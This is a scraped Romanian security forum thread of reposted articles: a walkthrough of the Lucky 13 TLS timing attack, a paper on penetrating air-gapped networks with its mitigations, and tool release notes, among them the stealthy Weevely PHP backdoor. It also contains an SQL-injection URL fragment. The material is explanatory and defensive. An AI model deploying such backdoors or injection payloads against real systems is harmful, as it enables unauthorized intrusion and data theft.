Nytro

[h=3]Attack of the week: TLS timing oracles[/h]Ever since I started writing this blog (and specifically, the posts on SSL/TLS) I've had a new experience: people come up to me and share clever attacks that they haven't made public yet. This is pretty neat -- like being invited to join an exclusive club. Unfortunately, being in this club mostly sucks. That's because the first rule of 'TLS vulnerability club' is: You don't talk about TLS vulnerability club. Which takes all the fun out of it. (Note that this is all for boring reasons -- stuff like responsible disclosure, publication and fact checking. Nobody is planning a revolution.) Anyway, it's a huge relief that I'm finally free to tell you about a neat new TLS attack I learned about recently. The new result comes from Nadhem AlFardan and Kenny Paterson of Royal Holloway. Dubbed 'Lucky 13', it takes advantage of a very subtle bug in the way records are encrypted in the TLS protocol. If you aren't into long crypto posts, here's the TL;DR: There is a subtle timing bug in the way that TLS data decryption works when using the (standard) CBC mode ciphersuite. Given the right set of circumstances, an attacker can use this to completely decrypt sensitive information, such as passwords and cookies. The attack is borderline practical if you're using the Datagram version of TLS (DTLS). It's more on the theoretical side if you're using standard TLS. However, with some clever engineering, that could change in the future. You should probably patch! For the details, read on. As always, we'll do this in the 'fun' question/answer format I save for these kinds of posts. What is TLS, what is CBC mode, and why should I care if it's broken? Some background: Transport Layer Security (née SSL) is the most important security protocol on the Internet. If you find yourself making a secure connection to another computer, there's a very good chance you'll be doing it with TLS. (Unless you're using UDP-based protocol, in which case you might use TLS's younger cousin Datagram TLS [DTLS]). The problem with TLS is that it kind of stinks. Mostly this is due to bad decisions made back in the the mid-1990s when SSL was first designed. Have you seen the way people dressed back then? Protocol design was worse. While TLS has gotten better since then, it still retains many of the worst ideas from the era. One example is the CBC-mode ciphersuite, which I've written about several times before on this blog. CBC-mode uses a block cipher (typically AES) to encrypt data. It's the most common ciphersuite in use today, probably because it's the only mandatory ciphersuitegiven in the spec. What's wrong with CBC mode? The real problem with TLS is not the encryption itself, but rather the Message Authentication Code (MAC) that's used to protect the integrity (authenticity) of each data record. Our modern understanding is that you should always encrypt a message first, then apply the MAC to the resulting ciphertext. But TLS gets this backwards. Upon encrypting a record, the sender first applies a MAC to the plaintext, then adds up to 255 bytes of padding to get the message up to a multiple of the cipher (e.g., AES's) block size. Only then does it CBC-encrypt the record. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Structure of a TLS record. The whole thing is encrypted with CBC mode.[/TD] [/TR] [/TABLE] The critical point is that the padding is not protected by the MAC. This means an attacker can tamper with it (by flipping specific bits in the ciphertext), leading to a very nasty kind of problem known as a padding oracle attack. In these attacks (example here), an attacker first captures an encrypted record sent by an honest party, modifies it, then re-transmits it to the server for decryption. If the attacker can learn whether her changes affected the padding -- e.g., by receiving a padding error as opposed to a bad MAC error -- she can use this information to adaptively decrypt the whole record. The structure of TLS's encryption padding makes it friendly to these attacks. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Closeup of a padded TLS record. Each byte contains the padding length, followed by another (pointless, redundant) length byte.[/TD] [/TR] [/TABLE] But padding oracle attacks are well known, and (D)TLS has countermeasures! The TLS designers learned about padding oracles way back in 2002, and immediately took steps to rectify them. Unfortunately, instead of fixing the problem, they decided to apply band-aids. This is a time-honored tradition in TLS design. The first band-aid was simple: eliminate any error messages that could indicate to the attacker whether the padding check (vs. the MAC check) is what caused a decryption failure. This seemed to fix things for a while, until some researchers figured out that you could simply time the server to see how long decryption takes, and thereby learn if the padding check failed. This is because implementations of the time would first check the padding, then return immediately (without checking the MAC) if the padding was bad. That resulted in a noticeable timing differential the attacker could detect. Thus a second band-aid was needed. The TLS designers decreed that decryption should always take the same amount of time, regardless of how the padding check comes out. Let's roll the TLS 1.2 spec: [T]he best way to do this is to compute the MAC even if the padding is incorrect, and only then reject the packet. For instance, if the pad appears to be incorrect, the implementation might assume a zero-length pad and then compute the MAC. Yuck. Does this even work? Unfortunately, not quite. When the padding check fails, the decryptor doesn't know how much padding to strip off. That means they don't know how long the actual message is, and therefore how much data to MAC. The recommended countermeasure (above) is to assume no padding, then MAC the whole blob. As a result, the MAC computation can take a tiny bit longer when the padding is damaged. The TLS designers realized this, but by this point they were exhausted and wanted to go think about something else. So they left us with the following note: This leaves a small timing channel, since MAC performance depends to some extent on the size of the data fragment, but it is not believed to be large enough to be exploitable, due to the large block size of existing MACs and the small size of the timing signal. And for the last several years -- at least, as far as we know -- they were basically correct. How does this new paper change things? The new AlFardan and Paterson result shows that it is indeed possible to distinguish the tiny timing differential caused by invalid padding, at least from a relatively close distance -- e.g., over a LAN. This is partly due to advances in computing hardware: most new computers now ship with an easily accessible CPU cycle counter. But it's also thanks to some clever statistical techniques that use many samples to smooth out and overcome the jitter and noise of a network connection. The upshot is that new technique can measure timing differentials of less than 1 microsecond over a LAN connection -- for example, if the attacker is in the same data center as your servers. It does this by making several thousand decryption queries and processing the results. Under the right circumstances, this turns out to be enough to bring (D)TLS padding oracle attacks back to life. How does the attack work? For the details, you should obviously read the full paper or at least the nice FAQ that Royal Holloway has put out. Here I'll try to give some intuition. Before I can explain the attack, you need to know a little bit about how hash-based MACs work. TLS typically uses HMAC with either MD5, SHA1 or SHA256 as the hash function. While these are very different hash functions, the critical point is that each one processes messages in 64-byte blocks. Consequently, hashing time is a function of the number of blocks in the message, not the number of bytes. Going from a 64-byte input to a 65-byte input means an entire extra block, and hence a (relatively) large jump in the amount of computation time (an extra iteration of the hash function's compression function). There are a few subtleties in here. The hash functions incorporate an 8-byte length field plus some special hash function padding, which actually means a one-block message can only contain about 55 bytes of real data (which also includes the 13-byte record header). The HMAC construction adds a (constant) amount of additional work, but we don't need to think about that here. So in summary: you can get 55 bytes of data into one block of the hash. Go a single byte beyond that, and the hash function will have to run a whole extra round, causing a tiny (500-1000 hardware cycle) delay. The attack here is to take a message that -- including the TLS padding -- would fall above that 55 byte boundary. However, the same message with padding properly removed would fall below it. When an attacker tampers with the message (damaging the padding), the decryption process will MAC the longer version of the message -- resulting in a measurably higher computation time than when the padding checks out. By repeating this process many, many thousand (or millions!) of times to eliminate noise and network jitter, it's possible to get a clear measurement of whether the decryption succeeded or not. Once you get that, it's just a matter of executing a standard padding oracle attack. But there's no way this will work on TLS! It'll kill the session! Please recall that I described this as a practical attack on Datagram TLS (DTLS) -- and as a more theoretical one on TLS itself.* There's a reason for this. The reason is that TLS (and not DTLS) includes one more countermeasure I haven't mentioned yet: anytime a record fails to decrypt (due to a bad MAC or padding error), the TLS server kills the session. DTLS does not do this, which makes this attack borderline practical. (Though it still takes millions of packet queries to execute.) The standard TLS 'session kill' feature would appear to stop padding oracle attacks, since they require the attacker to make many, many decryption attempts. Killing the session limits the attacker to one decryption -- and intuitively that would seem to be the end of it. But actually, this turns out not to be true. You see, one of the neat things about padding oracle attacks is that they can work across different sessions (keys), provided that that (a) your victim is willing to re-initiate the session after it drops, and ( the secret plaintext appears in the same position in each stream. Fortunately the design of browsers and HTTPS lets us satisfy both of these requirements. To make a target browser initiate many connections, you can feed it some custom Javascript that causes it to repeatedly connect to an SSL server (as in the CRIME attack). Note that the Javascript doesn't need to come from the target webserver -- it can even served on an unrelated non-HTTPS page, possibly running in a different tab. So in short: this is pretty feasible. Morover, thanks to the design of the HTTP(S) protocol, each of these connections will include cookies at a known location in HTTP stream. While you may not be able to decrypt the rest of the stream, these cookie values are generally all you need to break into somebody's account. Thus the only practical limitation on such a cookie attack is the time it takes for the server to re-initiate all of these connections. TLS handshakes aren't fast, and this attack can take tens of thousands (or millions!) of connections per byte. So in practice the TLS attack would probably take days. In other words: don't panic. On the other hand, don't get complacent either. The authors propose some clever optimizations that could take the TLS attack into the realm of the feasible (for TLS) in the near future. How is it being fixed? With more band-aids of course! But at least this time, they're excellent band-aids. Adam Langley has written a 500-line OpenSSL patch (!) that modifies the CBC-mode decryption procedure to wipe out the timing differentials used by this attack. I would recommend that you think about updating at least your servers in the future (though we all know you won't). Microsoft products should also see updates soon are allegedly not vulnerable to this attack, so won't need updates.** Still, this is sort of like fixing your fruitfly problem by spraying your kitchen with DDT. Why not just throw away the rotted fruit? In practice, that means moving towards modern AEAD ciphersuites like AES-GCM, which should generally end this madness. We hope. Why not switch to RC4? RC4 is not an option in DTLS. However, it will mitigate this issue for TLS, since the RC4 ciphersuite doesn't use padding at all. In fact, this ancient ciphersuite has been (hilariously) enjoying a resurgence in recent years as the 'solution' to TLS attacks like BEAST. Some will see this attack as further justification for the move. But please don't do this. RC4 is old and creaky, and we really should be moving away from it too. So what's next for TLS? I'd love to say more, but you see, the firstrule of TLS vulnerability club is... Notes: * The attack on Datagram TLS is more subtle, and a lot more interesting. I haven't covered it much in this post because TLS is much more widely used than DTLS. But briefly, it's an extension of some previous techniques -- by the same authors -- that I covered in this blog last year. The gist is that an attacker can amplify the impact of the timing differential by 'clogging' the server with lots of unrelated traffic. That makes these tiny differentials much easier to detect. ** And if you believe that, I have a lovely old house in Baltimore to sell you... Posted by Matthew Green at 4:00 AM Sursa: A Few Thoughts on Cryptographic Engineering: Attack of the week: TLS timing oracles

Nu e gratuit. Ai "platit" pentru Windows si Office

Patch de securitate urias de la Microsoft de Redactia Hit | 8 februarie 2013 Microsoft va publica, saptamana viitoare, un update de securitate pentru Windows ce contine nu mai putin de 57 de patch-uri pentru eliminarea bug-urilor. Pachetul va contine 12 update-uri de securitate dintre care cinci sunt considerate critice. Vizate pentru eliminarea vulnerabilitatilor sunt Windows-ul, Internet Explorer-ul si suita Office. Din numarul total de update-uri, cinci sunt dedicate Windows 7, patru Windows 8 si trei Windows XP SP3, afirma reprezentantii companiei nCircle. Nu este prima data cand Microsoft publica astfel de pachete "monstru" cu update-uri de securitate, scrie Computerworld. In aprilie 2011, compania punea la dispozitia utilizatorilor un patch cu nu mai putin de 64 update-uri pentru eliminarea unor vulnerabilitati in programele sale. Sursa: Computerworld.com Via: Patch de securitate urias de la Microsoft | Hit.ro

APISPY32 Be sure to read Readme.txt! It now works with executables that have their IAT merged into read-only data sections. I've run it successfully on Windows 2000 and Windows XP. Oldie... http://www.wheaty.net/APISPY32.zip

Cum func?ioneaz? un centru pentru testarea antiviru?ilor Un articol din seria “cum func?ioneaz?”, dar nu v? ar?t nici o fabric? de ma?ini ?i nici depozitul eMAG, ci un centru de testare a antiviru?ilor. În lume sunt dou? mari organiza?ii independente de testare: AV-Comparatives din Austria, mai exact Innsbruck, ?i AV-Test din Germania. Acum sunt la AV-Comparatives. Ce vede?i mai jos este camera de control a testului. Testele comparative sunt foarte complexe pentru c?: se folosesc computere reale, nu ma?ini virtuale (unii viru?i reac?ioneaz? altfel pe VM). se testeaz? pe configura?ii normale, asem?n?toare de media din comer? dpdv hardware ?i software instalat. programele de securitate sunt testate pe aproximativ 200.000 – 300.000 de viru?i descoperi?i în ultimele luni ?i multe URL-uri de phishing ?i malware. în toate testele se fac screenshot-uri, log-uri de fi?iere modificate, ce ?i cum a detectat antivirusului, când ?i cum a reac?ionat, plus clipuri video. situa?iile se salveaz? pentru replicare ulterioar?. De aici rezult? configura?ia uimitoare a centrului de testare. rackurile din stânga sunt pline de sta?ii de lucru, câteva zeci de buc??i. 25 de monitoare sunt disponibile pentru a fi conectate la sta?ii. rack-ul din dreapta con?ine servere de control ?i 400 TB de spa?iu de stocare. în total au 600 GB de memorie RAM instalat? în echipamente. serverul de control ruleaz? un soft dezvoltat de AV-Comparatives care porne?te ?i opre?te sta?iile de testare, le instaleaz? sistem de operare, le atac?, le pune s? intre pe net pe site-uri dubioase, s? se uite la pornografie, s? dea click pe linkuri din emailuri ciudate, s? instaleze toate toolbar-urile pe care le vor. Tot acest server face ?i screenshot-uri, video-uri, loguri ?i tot restul. au 3 conexiuni independente la net, 256 de IP-uri ?i acces la IP-uri din întreaga lume (unele malware-uri infecteaz? doar anumite ??ri, a?a c? trebuie simulat c? ar fi de acolo). De ce se pune mare pre? pe rezultatele testelor AV-Comparatives? Pentru c? au o procedur? de testare foarte bine pus? la punct, exhaustiv?, care minimizeaz? ?ansa de a gre?i un test ?i pentru c? sunt o organiza?ie independent?. E genul de industrie în care conteaz? nu numai rezultatul, ci ?i cine a f?cut testul, iar AV-Comparatives este un nume respectat în toat? lumea. De ce i-ai crede c? sunt independen?i? Eu i-am crezut. Am v?zut aici numai oameni pasiona?i de acest domeniu, oameni care au pornit de la zero din dorin?a de a testa pe bune ?i au creat o organiza?ie mare ?i frumoas?. În plus, procedura de testare, fiecare detaliu, este discutat cu fiecare furnizor de antivirus ?i cei care au obiec?ii pot cere modificarea ei. Dup? testare produc?torii au acces la toate log-urile ?i rezultatele detaliate, astfel încât dac? vor considera c? au fost depuncta?i inutil sau c? testele au fost gre?ite pot face contesta?ii ?i se poate resimula totul. O parte din independen?? vine ?i din metodele de finan?are. AV-Comparatives cere o sum? fix? de la fiecare produc?tor care dore?te s? introduc? un produs în test, un fel de tax? de participare. În plus sunt finan?a?i de dou? universit??i prin programe de cercetare (Innsbruck ?i Hong Kong), de un institut de dezvoltare a tehnologiei ?i de statul austriac, care vrea s? ?tie ce antivirus s? cumpere. AV-Comparatives nu are profit. Au cheltuieli anuale de aproximativ 500.000 de euro ?i le sus?in din aceste finan??ri f?r? a face ?i profit. Programatorii care au f?cut softul de control ?i testare automatizat? (i-am cunoscut ieri, tinerei) au f?cut o frumuse?e de program. Am v?zut screenshot-uri ?i pe cât de complex este pe atât de u?or de în?eles dintr-o privire mi s-a p?rut. Nu doar partea de raportare ?i logging, dar pân? ?i pe screenshot-urile ce se fac periodic se ruleaz? programe OCR care identific? eventualele mesaje de la antivirus, automatizând întregul proces. Am apreciat ?i grija pentru detalii. URL-urile cu malware se testeaz? simultan, pentru c? în timp dispar sau sunt raportate ca fiind nocive. Bine, nu chiar simultan, ci la o întârziere de 5 secunde, pentru a nu porni fix în acela?i timp toate ma?inile ?i a nu face un fel de spam acolo. ?i testeaz? simulând IP-uri dintr-o anumit? ?ar?, dar mereu schimbate, pentru c? unele malware nu infecteaz? acela?i IP de dou? ori, ba chiar ?i cu diverse set?ri localizate de Windows. V-am spus, oameni pasiona?i ?i aten?i la toate detaliile. Nimic din ce am auzit c? fac nu mi s-a p?rut “la nimereal?”. Conteaz? un astfel de premiu de la AV-Comparatives? Da, foarte mult. Când o revist? precum PC Magazine, cu milioane de cititori, spune “cump?ra?i Bitdefender pentru c? exper?ii de la AV-Comparatives spun c?-i cel mai bun ?i noi avem încredere în ei”, e ceva. Apoi în lumea corporate sunt foarte multe echipe tehnice care nu pot testa chiar ele toate programele de pe pia?? atunci când aleg un soft pentru o firm? cu mii de calculatoare, dar care au încredere în AV-Comparatives ?i rezultatele lor. E ca atunci când e?ti bolnav ?i ai încredere în ce-?i recomand? medicul, nu te apuci tu s? înve?i medicina de la zero. Bine, nu m? îndoiesc c? la noi în ?ar? vor fi mul?i care vor spune c? ?tiu ei mai bine c? X e mai bun ?i Y e mai lent ?i Z nu detecteaz? nimic, bazat nu pe teste de 300.000 de viru?i, ci pe 1-2 p??anii personale. Cu alt? ocazie v? spun mai multe despre Bitdefender pentru c? am avut ocazia s? discut una alta cu CEO-ul companiei, dl. Florin Talpe?. Pân? atunci, mai jos este un top al antiviru?ilor pentru rezultatele unui test Real World Protection Test de anul trecut: Bitdefender G Data Trend Micro F-Secure BullGuard Qihoo 360 (popular în China) Kaspersky Cele cu bold folosesc tehnologie Bitdefender, cump?rat? de la români de c?tre respectivele firme sub forma unor parteneriate. V-am mai spus c? avem toate motivele s? fim mândri c? un soft atât de performant ?i avansat dpdv al tehnologiei de detec?ie este produs integral în România. Sursa: Cum func?ioneaz? un centru pentru testarea antiviru?ilor | nwradu blog

fixed realm buffer size Deloc profesional...

Trebuie vazut: DevOps Reactions

Daca ar pune la noi, sa presupunem: 1. Un user descarca de pe filelist cu 10 MB/s 2. Traficul mediu este de 100 KB/s Bucuresti, 2 milioane de locuitori, 510.000 de persoane cu acces la internet, 10.000 descarca de ep filelist. 10.000 * 10 MB + 500.000 * 0.1 MB/s = 100.000 MB/s + 50.000 MB/s = 100 TB/s + 50 TB/s = 150 TB/s Dintre care RDS sa presupunem ca are 100 TB/s. Sa filtrezi toate acele pachete, nu pare imposibil, dar pare aproape imposibil. Bine, realist vorbind, cu legea Big Brother prin care ISPii erau obligati sa pastreze loguri, probabil salveaza capetele conexiunii, sursa si destinatia IP ceea ce inseamna ca sa face o "despachetare" a pachetelor deja. Asta mai inseamna si faptul ca, sarind peste headerele TCP/IP se poate obtine usor linia "GET /page.php?id=-1 union..." siliniea de "Host: www.rds.ro" care sa fie pastrate in loguri. Voi ce parere aveti? In orice caz, TOR rullz!

Penetrating and Achieving Persistence in Highly Secured Networks By: Bogdan Botezatu Only a couple of years ago, cyber-criminals almost exclusively targeted Internet-connected end-users and companies. Now, high profile attacks target isolated, highly secure corporate or business environments. This paper describes the challenges of breaching such systems, achieving persistence for as long as possible and payload delivery mechanisms. Ever since government and companies adopted the Internet on a massive scale, cyber-criminals have become interested in breaching these critical infrastructures and monetizing them in various ways, with particular focus on disruption and information theft. The continuous siege from outside hostile parties has prompted businesses, enterprises, governments and mission-critical service companies such as utility providers to isolate their networks and render them inaccessible (or limit their accessibility) to the outside world. As a rule, the more critical the network is, the higher the degree of isolation. How is successful penetration carried in isolated environments? One of the most frequent mistakes when deploying a highly secure network is allowing it to be extended without the intervention of a network administrator. Many times, employees trade security for usability without even realizing they are exposing the network to outside threats. Wireless access points installed without notification and without proper security, public and private network bridging through proxy servers or the installation of other devices for tethering (i.e. mobile phones or 3G modems) can and will annihilate any safety mechanism the network administrator has in place. An advanced persistent threat attack begins with either exploiting one of the technical vulnerabilities exposed above, or by social engineering the user into breaking security protocols of the organization, such as the restriction to plug in a USB drive in computers that are part of the private network. The goal of an advanced persistent threat is gaining prolonged access to an organization’s resources for monitoring or sabotage. Figure 1: Vulnerable spots of a protected network. Wireless extensions and unauthorized gateways to the Internet expose the network to outside attackers. Exploitation of an unauthorized extension of the network with wireless devices is the easiest method in which a cyber-criminal in close proximity can gain access to a protected environment. In the absence of a strong audit of the network configuration, legitimate users could add a wireless router in a spare Ethernet outlet or even bridge a wireless connection to work in access point mode. Most of the times, these are not deliberate acts of sabotage, but fatal mistakes aimed at enhancing usability of a restrictive networking environment (i.e. sharing the local internet connection with a smartphone or creating a wireless connection in the meeting room without consent from the network administrator). This way, any nearby attacker can probe the Wi-Fi space for unprotected or poorly-secured networks, then use open-source tools to attack WEP, WPA, LEAP or even VPNs and other proprietary wireless technologies[1]. Once the network has been identified, cracking the rudimentary encryption would allow the attacker to connect to the network to access resources. Mitigation: As a system administrator, you should always disable any Ethernet outlet that is not in permanent use directly from the patch panel in the server room. Configure your DHCP server to lease IPs by MAC addresses only. Talk to employees about the importance of keeping the network isolated at all times. Make them understand that any modification to the network infrastructure will have disastrous effects. Use Wi-Fi space monitoring tools to detect wireless signals originating from your facility. A simple $10 key fob Wi-Fi signal detector is often enough to identify illegal access points in your organization Unregulated access to the internet via 3G modems or 3G tethering defeats the purpose of isolating the network environment. Whenever the user connects to the internet through a personal device from a machine that is part of the isolated network, they become perfect targets for blended threats – malware delivered via well formatted e-mail messages that trick the user into either downloading an infected and apparently innocuous attachment (such as a PDF or document file) or prompt the user to visit a legitimate website hosting malware. Mitigation: Enforce security policies on all computers connected to the network. Disable or render USB ports physically inaccessible to prevent storage devices from connecting to the PC. This way, users can’t inadvertently plant malware and can’t move stolen information outside of the network. Block Bluetooth and wireless on host computers to disallow file transfers and interconnection with user-owned devices. Personal storage and multimedia devices arbitrarily plugged into network computers can act as highly effective vectors not only for malware, but also for the information that escapes the network to the attacker’s command and control server. This approach, although less effective than directly sending data to the attacker via the Internet, has proven much more successful in high-profile attacks such as the Flamer incident[2]. Last, but not least, mind the physical security of the facility. Even the most secured networking environment is useless if physical access to the facility, data center or server room is lax or unregulated. Skilled social engineers can cut their way through office buildings; determined attackers can convince or coerce personnel with access to the building (employees, janitorial team, maintenance crew) to plant devices for them and open security breaches at the network perimeter. The Darpa-funded Pwnie Express products[3] for instance are disguised as power strips and can be connected to the network, then used by attackers for persistent access to the network over 3G. Achieving persistence in isolated environments For long-term exploitation of the isolated network, attackers use a combination of malware tools that take care of deployment, data and password gathering, scanning the network perimeter and reporting. These tools keep a low profile and are specially designed to evade antivirus detection. The evasion is possible because, most of the time, the cyber-criminal team behind the attack uses brand-new code that has never been seen in the wild by antivirus vendors. Zero-day exploitation against client software plays a key role in the stealthy dissemination of the payload across the network, aided by unconventional malware programming using less known APIs and next to no obfuscation of the malicious code. A key advantage of an isolated environment is that it is considered clean and virus-free. By design, they allow no intrusion from the outside, as they are rarely connected to other networks. More than that, one of the most effective means of defense against malware is only partially functional: in the absence of a permanent connection to the internet to deliver hourly malware signature updates, the antivirus uses only outdated signatures and behavioral patterns – two technologies that are highly ineffective against brand-new malicious code engineered to conceal suspicious behavior. We know advanced malicious code used in breaching isolated networks often comes unencrypted, unpacked and needs no internet connection to operate. These features are critical in evading antivirus detection that monitors code changes, entropy and typical malicious behavior. This was the case of Flamer, the world’s largest piece of malware, which avoided detection by having the exact opposite features of modern, commercial malware. In the absence of an antivirus solution to flag the intrusion, it is up to the network administrator to mitigate a possible infection by constantly monitoring network traffic and ensuring that security policies are enforced. Figure 2: The circuit of a Flamer-infected device: the employee is used both as a vector of infection and as a carrier for stolen data Payload delivery and operation mechanism One of the most frequently-encountered misconceptions is that a piece of malware is only harmful when it can actively communicate with the command and control server. While this is mostly true for consumer-grade malware that specializes in sending spam, harvesting addresses or manipulating banking transactions, the outlook is different for military-grade e-threats the size and complexity of Stuxnet, Duqu or Flamer. Malware specializing in cyber-espionage rarely relies on the local connection to the Internet to siphon data outside of the perimeter. That approach would likely trigger firewall alerts; the huge amount of data sent to the C & C server is also likely to be visible to packet inspection applications such as Wireshark, which will compromise the operation. More likely, the attackers use an employee’s removable device as transportation between the isolated network and an unmonitored, compromised workstation at the employee’s home, for instance. Not all malware is tailored for espionage and persistence, but is rather focused on delivering a payload or fulfilling a mission. This was the case of Stuxnet, world’s first piece of malware that was tailored to subvert an industrial system to compromise the production process at the Natanz-based uranium enrichment facility in Iran. The e-threat was particularly designed to seize control the Siemens Simatic WinCC SCADA applications controlling centrifuge machines and did not affect computers or networks that did not meet specific architecture requirements. Conclusion Isolated networks are the ultimate fortresses, but they are penetrable. The ecosystem is as safe as its weakest link: the human user, be it employee, system or network administrator. The Stuxnet and Flamer incidents have demonstrated that even the most secured networks are no match for cyber-weapons, instruments designed to go where no piece of malware has gone before. These instruments, who likely share the same origin, prove that highly-skilled cyber-criminal groups can always take the game one step further and bring more and more sophisticated threats to outsmart defense mechanisms. [1] Jeremy Faircloth, Penetration Tester’s Open Source Toolkit, third edition – Elsevier, 2011 [2] Bogdan Botezatu, FLAME – The Story of Leaked Data Carried by Human Vector – FLAME – The Story of Leaked Data Carried by Human Vector | Bitdefender Labs [3] Power Pwn | Pwnie Express About The Author Bogdan Botezatu Senior E-Threat Analyst Bogdan Botezatu is living his second childhood at Bitdefender as senior e-threat analyst. When he is not documenting sophisticated strains of malware or writing removal tools, he teaches extreme sports such as surfing the web without protection or rodeo with wild Trojan horses. He believes that most things in life can be beat with strong heuristics and that antimalware research is like working for a secret agency: you need to stay focused at all times, but you get all the glory when you catch the bad guys. Sursa: Penetrating and Achieving Persistence in Highly Secured Networks | HOTforSecurity

[h=1]Weevely 1.0[/h]by Mayuresh on February 5, 2013 Our old post regarding the weevely tiny PHP backdoor can be found here. Recently, an update was released – weevely version 1.0, that brings new modules with totally refactored structure to assist remote administration tasks and penetration testing. “Weevely is an unobtrusive PHP backdoor that simulate telnet-like connection. It is an essential tool for application web attack post exploitation or web hosting account management. With a basic permission to upload PHP files, you only need to generate and upload the “server” PHP code on the target, and run locally Weevely to transmit shell commands. Backdoor communications are obfuscated into referrer of regular HTTP requests Backdoor code is hidden and compact because of functions dynamically injected and not embedded in User have modules available to automate interaction with remote system Modules implements different techniques to accomplish given tasks, aiming to bypass disabled_functions, safe_mode and other PHP” [h=2]Changes made in Weevely 1.0:[/h] Supports of Windows and MacOS hosts environments Module :net.mount, powered by HTTPfs, that mounts automagically remote filesystem to a local mountpoint Module :file.edit to edit remote files with your favourite local text editor Module :audit.systemfiles to find system files with bad permissions that could affect server security Module :audit.phpconf to audit common PHP misconfiguration SOCKS4 and SOCKS5 proxy supports Totally rewritten module base structure to simplify module deploying Modules arguments managament with argparse Tons of bug fixes [h=3]Download weevely:[/h] Weevely 1.0 – weevely-1.0.tar.gz/Weevely github Sursa: Weevely version 1.0! — PenTestIT

[h=1]TLSSLed v1.3[/h]by Mayuresh on February 6, 2013 We included TLSSLed in our list of List of SSL Scanners for Penetration Testers! A few days ago, an update was released – TLSSLed version 1.3! This version is the result of testing lots of HTTPS (SSL/TLS) implementations during real-world pen-tests, so it is full of minor improvements and extra checks to identify different behaviors we have found in the wild. Additionally, the tool output has been changed for easy reading and to provide quick information for each finding: negative [-], positive [+], or informational [.] (as well as grouping tests [*] and highlight warning and error messages [!]). “TLSSLed is a Linux shell script whose purpose is to evaluate the security of a target SSL/TLS (HTTPS) web server implementation. It is based on sslscan, a thorough SSL/TLS scanner that is based on the openssl library, and on the “openssl s_client” command line tool. The current tests include checking if the target supports the SSLv2 protocol, the NULL cipher, weak ciphers based on their key length (40 or 56 bits), the availability of strong ciphers (like AES), if the digital certificate is MD5 signed, and the current SSL/TLS renegotiation capabilities.” [h=2]This is the official change log for TLSSLed v1.3:[/h] All file output goes to a single directory (same file names as in previous versions) instead of to the working local directory. Change in the date format used for log files: From: 2011-12-30_105055 – To: 20111230-105055 Test if SSL/TLS renegotiation is enabled (NEW check) and if the target service supports secure renegotiation (already in previous versions). If secure renegotiation is not supported, we must check renegotiation by using legacy renegotiation (two new log files are used). New test to check for legacy renegotiation even when secure renegotiation is supported, just in case the target service supports both. Test if client certificate authentication is required by the target service. If so, identify the number of CAs accepted and save the list of CAs to a file. New test to check for HTTP headers using HTTP/1.0 (previous versions) as well as HTTP/1.1 and a valid Host header. New log files created for this. New error handling code for the initial SSL/TLS verification. Optimizations in the openssl delays (sleep timers). New DELAY variable to control sleep timers (by default 3 seconds it was 5 before). New output indentation. New output code set for findings: – (negative), + (positive), . (info), * (group of checks) or ! (error/warning). LOGFILE changed to SSLSCANLOGFILE & ERRFILE changed to SSLSCANERRFILE. RENEGLEGACY???FILE(s) included in the final listing and removal process. Several changes to the output messages for the different findings. Duplication of “Preferred Server Cipher” output message removed. New check to test for RC4 in the preferred cipher(s) regarding BEAST. Use of openssl “-prexit” option for some weird target scenarios (CSA). Added the date and time at the beginning of the output. This version has been tested on updated versions of Samurai WTF 2.0 (running openssl 1.0.1 and sslscan 1.8.2), Backtrack5 R3 (running openssl 0.9.8k and sslscan 1.8.2), and Mac OS X Mountain Lion 10.8.x (running openssl 0.9.8r and sslscan 1.8.2). Samurai WTF 2.0 is the only one of these three that includes openssl v1.0.x by default, providing support for the TLS v1.1 and v1.2 protocol tests. Download TLSSLed: TLSSLed v1.3 – TLSSLed_v1.3.sh Sursa: TLSSLed v1.3! — PenTestIT

[h=1]Mobius Forensic Toolkit 0.5.16[/h]by Mayuresh on February 6, 2013 Mobius Forensic Toolkit is being continuously developed and it has been recently updated! The bug fixed release is Mobius Forensic Toolkit version 0.5.16. “Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Cases and item categories are defined using XML files for easy integration with other tools.” [h=2]Official release notes for Mobius Forensic Toolkit 0.5.16:[/h] This release features the Turing extension, an extension to handle cryptographic services. It is fully integrated to the Hive (registry) extension, so that when registry files are opened, it automatically records the user account password hashes and tests keywords such as LSA secrets, e-mail passwords, and Internet Explorer Autocomplete, among others. All hashes and passwords found are stored in an SQLite database. The Turing extension exports and imports to/from John The Ripper .pot files and to John The Ripper hash files. [h=3]Download Mobius Forensic Toolkit:[/h] Mobius Forensic Toolkit 0.5.16 – mobiusft-0.5.16.tar.gz/mobiusft-0.5.16.tar.bz2/mobiusft/mobiusft-0.5.16.zip Sursa: Mobius Forensic Toolkit 0.5.16! — PenTestIT

[h=1]NOWASP Mutillidae 2.4.3[/h]by Mayuresh on February 6, 2013 Our first post regarding NOWASP (Codename Mutillidae) can be found here. Recently an update – NOWASP (Codename Mutillidae) version 2.4.3 – was released. This release comes a new sqlmap target page with hints & links(Menu -> SQLi -> SQLMap Targets) and lots of bug fixes. “NOWASP (Mutillidae) is a free, open source web application provided to allow security enthusiast to pen-test a web application. NOWASP (Mutillidae) can be installed on Linux,Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to administrate a webserver. It is already installed on SamuraiWTF and Rapid7Metasploitable-2. The existing version can be updated on either. Containing dozens of vulns and hints to help the user; this is an easy-to-use web hacking environment deliberately designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an “assess the assessor” target for vulnerability assessment software.” [h=2]Official NOWASP (Mutillidae) change log:[/h] Added login.php page to the sqlmap targets in the menu Modified several links to open in new windows/tabs rather than taking over main screen Reduced some unneeded styles Added links for Firefox add-ons to home page Added link for sqlmap to home page Added new page with SQLMap practice targets, link to video, and new hints section [h=3]Download NOWASP (Mutillidae)[/h] NOWASP Mutillidae 2.4.3 – LATEST-mutillidae-2.4.3.zip Sursa: NOWASP Mutillidae 2.4.3! — PenTestIT

